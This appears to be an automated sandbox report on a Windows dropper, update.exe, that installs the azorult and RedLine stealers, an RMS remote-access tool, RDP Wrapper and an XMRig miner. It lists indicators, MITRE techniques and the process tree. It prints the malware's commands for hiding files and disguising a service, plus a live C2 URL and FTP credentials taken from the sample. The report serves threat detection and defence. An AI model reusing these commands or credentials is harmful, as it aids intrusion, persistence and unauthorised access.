azorult | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
1806s
max time network
1818s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 17:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.exe

Score

10^/10

azorult redline rms xmrig aspackv2 discovery evasion infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
45.141.184.35
Port:
21
Username:
alex
Password:
easypassword

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.91
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\ProgramData\WindowsTask\system.exe	family_redline
C:\ProgramData\WindowsTask\system.exe	family_redline

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8decoder.dll	acprotect
C:\ProgramData\Windows\vp8encoder.dll	acprotect

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\WindowsTask\MicrosoftHost.exe	xmrig
C:\ProgramData\WindowsTask\MicrosoftHost.exe	xmrig
behavioral32/memory/4180-528-0x00007FF7650C0000-0x00007FF765660000-memory.dmp	xmrig

ASPack v2.12-2.42 5 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 2 IoCs

Processes:

cmd.exeupdate.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Executes dropped EXE 40 IoCs

Processes:

wini.exewinit.execheat.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exetaskhostw.exeR8.exeRar.exetaskhost.exeRDPWInst.exeutorrent.exeazur.exeupdate.exesystem.exewinlogon.exeRDPWInst.exeRDPWinst.exeRDPWinst.exeaudiodg.exeMicrosoftHost.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhost.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exe

pid	process
3780	wini.exe
3928	winit.exe
2296	cheat.exe
848	taskhost.exe
484	rutserv.exe
3144	rutserv.exe
1796	rutserv.exe
2908	rutserv.exe
4980	taskhostw.exe
4004	R8.exe
4928	Rar.exe
4920	taskhost.exe
4364	RDPWInst.exe
2920	utorrent.exe
4904	azur.exe
4744	update.exe
4176	system.exe
4456	winlogon.exe
4392	RDPWInst.exe
392	RDPWinst.exe
2060	RDPWinst.exe
2892	audiodg.exe
4180	MicrosoftHost.exe
4352	taskhostw.exe
1932	taskhostw.exe
3968	taskhostw.exe
840	taskhostw.exe
1840	taskhostw.exe
4760	taskhost.exe
3000	taskhostw.exe
5048	taskhostw.exe
2492	taskhostw.exe
304	taskhostw.exe
1932	taskhostw.exe
1236	taskhostw.exe
1156	taskhostw.exe
1836	taskhostw.exe
3220	taskhostw.exe
2716	taskhostw.exe
3592	taskhostw.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8decoder.dll	upx
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\install\utorrent.exe	upx
C:\Programdata\Install\utorrent.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\ProgramData\WindowsTask\winlogon.exe	upx
C:\Programdata\WindowsTask\winlogon.exe	upx

Loads dropped DLL 6 IoCs

Processes:

azur.exesvchost.exesvchost.exe

pid process

4904 azur.exe
4904 azur.exe
4904 azur.exe
4904 azur.exe
3968 svchost.exe
3992 svchost.exe

pid	process
4904	azur.exe
4904	azur.exe
4904	azur.exe
4904	azur.exe
3968	svchost.exe
3992	svchost.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4152	icacls.exe
5016	icacls.exe
4816	icacls.exe
4544	icacls.exe
5084	icacls.exe
4172	icacls.exe
4104	icacls.exe
4316	icacls.exe
5092	icacls.exe
4184	icacls.exe
5076	icacls.exe
1196	icacls.exe
1400	icacls.exe
4608	icacls.exe
4672	icacls.exe
4264	icacls.exe
4236	icacls.exe
4840	icacls.exe
4520	icacls.exe
4548	icacls.exe
4636	icacls.exe
4788	icacls.exe
4196	icacls.exe
4192	icacls.exe
4244	icacls.exe
4956	icacls.exe
4428	icacls.exe
4824	icacls.exe
4480	icacls.exe
4388	icacls.exe
4800	icacls.exe
5072	icacls.exe
5108	icacls.exe
4880	icacls.exe
3704	icacls.exe
3316	icacls.exe
4524	icacls.exe
1276	icacls.exe
5028	icacls.exe
5056	icacls.exe
1488	icacls.exe
4644	icacls.exe
4764	icacls.exe
768	icacls.exe
4412	icacls.exe
4832	icacls.exe
4464	icacls.exe
1268	icacls.exe
4868	icacls.exe
4380	icacls.exe
4532	icacls.exe
4420	icacls.exe
4756	icacls.exe
5020	icacls.exe
4972	icacls.exe
4436	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

taskhostw.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 ip-api.com
55 checkip.amazonaws.com

flow	ioc
20	ip-api.com
55	checkip.amazonaws.com

Modifies WinLogon 2 TTPs 8 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

RDPWinst.exeupdate.exeRDPWInst.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 5 IoCs

Processes:

taskhost.exerutserv.exe

description	ioc	process
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe

Drops file in Program Files directory 31 IoCs

Processes:

update.exeRDPWinst.exeattrib.exeRDPWInst.exeattrib.exeutorrent.exe

description	ioc	process
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	utorrent.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

winit.exeazur.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	azur.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	azur.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4248 schtasks.exe
4448 schtasks.exe
3012 schtasks.exe
684 schtasks.exe
188 schtasks.exe
1200 schtasks.exe
5112 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4560 timeout.exe
4916 timeout.exe
4256 timeout.exe
4324 timeout.exe
4472 timeout.exe
3764 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

4768 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4828 taskkill.exe
5044 taskkill.exe
4932 taskkill.exe

pid	process
4248	schtasks.exe
4448	schtasks.exe
3012	schtasks.exe
684	schtasks.exe
188	schtasks.exe
1200	schtasks.exe
5112	schtasks.exe

pid	process
4560	timeout.exe
4916	timeout.exe
4256	timeout.exe
4324	timeout.exe
4472	timeout.exe
3764	timeout.exe

pid	process
4768	ipconfig.exe

pid	process
4828	taskkill.exe
5044	taskkill.exe
4932	taskkill.exe

Modifies registry class 6 IoCs

Processes:

cmd.exewini.exewinit.exeR8.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	R8.exe

NTFS ADS 3 IoCs

Processes:

taskhost.exeupdate.exeutorrent.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	update.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	utorrent.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

2228 regedit.exe
2100 regedit.exe
Runs net.exe

pid	process
2228	regedit.exe
2100	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exe

pid	process
740	update.exe
740	update.exe
740	update.exe
740	update.exe
740	update.exe
740	update.exe
740	update.exe
740	update.exe
740	update.exe
740	update.exe
484	rutserv.exe
484	rutserv.exe
484	rutserv.exe
484	rutserv.exe
484	rutserv.exe
484	rutserv.exe
3144	rutserv.exe
3144	rutserv.exe
1796	rutserv.exe
1796	rutserv.exe
2908	rutserv.exe
2908	rutserv.exe
2908	rutserv.exe
2908	rutserv.exe
2908	rutserv.exe
2908	rutserv.exe
2908	rutserv.exe
2908	rutserv.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe
3928	winit.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

taskhostw.exetaskhost.exe

pid process

4980 taskhostw.exe
4920 taskhost.exe
Suspicious behavior: LoadsDriver 4 IoCs

Processes:

pid process

612
612
612
612

pid	process
4980	taskhostw.exe
4920	taskhost.exe

pid	process
612
612
612
612

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

rutserv.exerutserv.exerutserv.exetaskkill.exetaskkill.exetaskkill.exesvchost.exeRDPWInst.exesystem.exeRDPWinst.exesvchost.exeRDPWinst.exesvchost.exeMicrosoftHost.exe

description	pid	process
Token: SeDebugPrivilege	484	rutserv.exe
Token: SeDebugPrivilege	1796	rutserv.exe
Token: SeTakeOwnershipPrivilege	2908	rutserv.exe
Token: SeTcbPrivilege	2908	rutserv.exe
Token: SeTcbPrivilege	2908	rutserv.exe
Token: SeDebugPrivilege	4932	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	5044	taskkill.exe
Token: SeAuditPrivilege	4864	svchost.exe
Token: SeDebugPrivilege	4364	RDPWInst.exe
Token: SeDebugPrivilege	4176	system.exe
Token: SeDebugPrivilege	392	RDPWinst.exe
Token: SeAuditPrivilege	4120	svchost.exe
Token: SeDebugPrivilege	2060	RDPWinst.exe
Token: SeAuditPrivilege	3992	svchost.exe
Token: SeLockMemoryPrivilege	4180	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	4180	MicrosoftHost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

update.exe

pid process

4744 update.exe
4744 update.exe
4744 update.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

update.exe

pid process

4744 update.exe
4744 update.exe
4744 update.exe

pid	process
4744	update.exe
4744	update.exe
4744	update.exe

pid	process
4744	update.exe
4744	update.exe
4744	update.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

winit.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhostw.exeR8.exeupdate.exe

pid	process
3928	winit.exe
848	taskhost.exe
484	rutserv.exe
3144	rutserv.exe
1796	rutserv.exe
2908	rutserv.exe
4400	WinMail.exe
4392	WinMail.exe
4980	taskhostw.exe
4004	R8.exe
4744	update.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

update.exewini.exeWScript.execmd.execheat.execmd.execmd.execmd.exe

description	pid	process	target process
PID 740 wrote to memory of 3780	740	update.exe	wini.exe
PID 740 wrote to memory of 3780	740	update.exe	wini.exe
PID 740 wrote to memory of 3780	740	update.exe	wini.exe
PID 3780 wrote to memory of 508	3780	wini.exe	WScript.exe
PID 3780 wrote to memory of 508	3780	wini.exe	WScript.exe
PID 3780 wrote to memory of 508	3780	wini.exe	WScript.exe
PID 3780 wrote to memory of 3928	3780	wini.exe	winit.exe
PID 3780 wrote to memory of 3928	3780	wini.exe	winit.exe
PID 3780 wrote to memory of 3928	3780	wini.exe	winit.exe
PID 508 wrote to memory of 1348	508	WScript.exe	cmd.exe
PID 508 wrote to memory of 1348	508	WScript.exe	cmd.exe
PID 508 wrote to memory of 1348	508	WScript.exe	cmd.exe
PID 1348 wrote to memory of 2228	1348	cmd.exe	regedit.exe
PID 1348 wrote to memory of 2228	1348	cmd.exe	regedit.exe
PID 1348 wrote to memory of 2228	1348	cmd.exe	regedit.exe
PID 740 wrote to memory of 2296	740	update.exe	cheat.exe
PID 740 wrote to memory of 2296	740	update.exe	cheat.exe
PID 740 wrote to memory of 2296	740	update.exe	cheat.exe
PID 1348 wrote to memory of 2100	1348	cmd.exe	regedit.exe
PID 1348 wrote to memory of 2100	1348	cmd.exe	regedit.exe
PID 1348 wrote to memory of 2100	1348	cmd.exe	regedit.exe
PID 1348 wrote to memory of 3764	1348	cmd.exe	timeout.exe
PID 1348 wrote to memory of 3764	1348	cmd.exe	timeout.exe
PID 1348 wrote to memory of 3764	1348	cmd.exe	timeout.exe
PID 2296 wrote to memory of 848	2296	cheat.exe	taskhost.exe
PID 2296 wrote to memory of 848	2296	cheat.exe	taskhost.exe
PID 2296 wrote to memory of 848	2296	cheat.exe	taskhost.exe
PID 740 wrote to memory of 3012	740	update.exe	schtasks.exe
PID 740 wrote to memory of 3012	740	update.exe	schtasks.exe
PID 740 wrote to memory of 3012	740	update.exe	schtasks.exe
PID 740 wrote to memory of 684	740	update.exe	schtasks.exe
PID 740 wrote to memory of 684	740	update.exe	schtasks.exe
PID 740 wrote to memory of 684	740	update.exe	schtasks.exe
PID 740 wrote to memory of 188	740	update.exe	schtasks.exe
PID 740 wrote to memory of 188	740	update.exe	schtasks.exe
PID 740 wrote to memory of 188	740	update.exe	schtasks.exe
PID 1348 wrote to memory of 484	1348	cmd.exe	rutserv.exe
PID 1348 wrote to memory of 484	1348	cmd.exe	rutserv.exe
PID 1348 wrote to memory of 484	1348	cmd.exe	rutserv.exe
PID 740 wrote to memory of 1200	740	update.exe	schtasks.exe
PID 740 wrote to memory of 1200	740	update.exe	schtasks.exe
PID 740 wrote to memory of 1200	740	update.exe	schtasks.exe
PID 740 wrote to memory of 3476	740	update.exe	cmd.exe
PID 740 wrote to memory of 3476	740	update.exe	cmd.exe
PID 740 wrote to memory of 3476	740	update.exe	cmd.exe
PID 3476 wrote to memory of 3548	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 3548	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 3548	3476	cmd.exe	sc.exe
PID 740 wrote to memory of 2248	740	update.exe	cmd.exe
PID 740 wrote to memory of 2248	740	update.exe	cmd.exe
PID 740 wrote to memory of 2248	740	update.exe	cmd.exe
PID 1348 wrote to memory of 3144	1348	cmd.exe	rutserv.exe
PID 1348 wrote to memory of 3144	1348	cmd.exe	rutserv.exe
PID 1348 wrote to memory of 3144	1348	cmd.exe	rutserv.exe
PID 2248 wrote to memory of 3656	2248	cmd.exe	sc.exe
PID 2248 wrote to memory of 3656	2248	cmd.exe	sc.exe
PID 2248 wrote to memory of 3656	2248	cmd.exe	sc.exe
PID 740 wrote to memory of 2128	740	update.exe	cmd.exe
PID 740 wrote to memory of 2128	740	update.exe	cmd.exe
PID 740 wrote to memory of 2128	740	update.exe	cmd.exe
PID 2128 wrote to memory of 2996	2128	cmd.exe	sc.exe
PID 2128 wrote to memory of 2996	2128	cmd.exe	sc.exe
PID 2128 wrote to memory of 2996	2128	cmd.exe	sc.exe
PID 1348 wrote to memory of 1796	1348	cmd.exe	rutserv.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1612 attrib.exe
796 attrib.exe
2168 attrib.exe
2620 attrib.exe
4540 attrib.exe

pid	process
1612	attrib.exe
796	attrib.exe
2168	attrib.exe
2620	attrib.exe
4540	attrib.exe

C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:740

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3780

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
5⤵
- Runs .reg file with regedit
PID:2228

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
5⤵
- Runs .reg file with regedit
PID:2100

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:3764

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:484

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3144

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1796

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
5⤵
- Views/modifies file attributes
PID:1612

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
5⤵
- Views/modifies file attributes
PID:796

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
5⤵
PID:3748

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
5⤵
PID:3852

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
5⤵
PID:3840

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3928

C:\Program Files (x86)\Windows Mail\WinMail.exe
"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
4⤵
- Suspicious use of SetWindowsHookEx
PID:4400

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
5⤵
- Suspicious use of SetWindowsHookEx
PID:4392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
4⤵
PID:4476

C:\Windows\SysWOW64\timeout.exe
timeout 5
5⤵
- Delays execution with timeout.exe
PID:4560

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2296

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
3⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:848

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4980

C:\ProgramData\Microsoft\Intel\R8.exe
C:\ProgramData\Microsoft\Intel\R8.exe
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4004

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
5⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
6⤵
- Modifies registry class
PID:1904

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4828

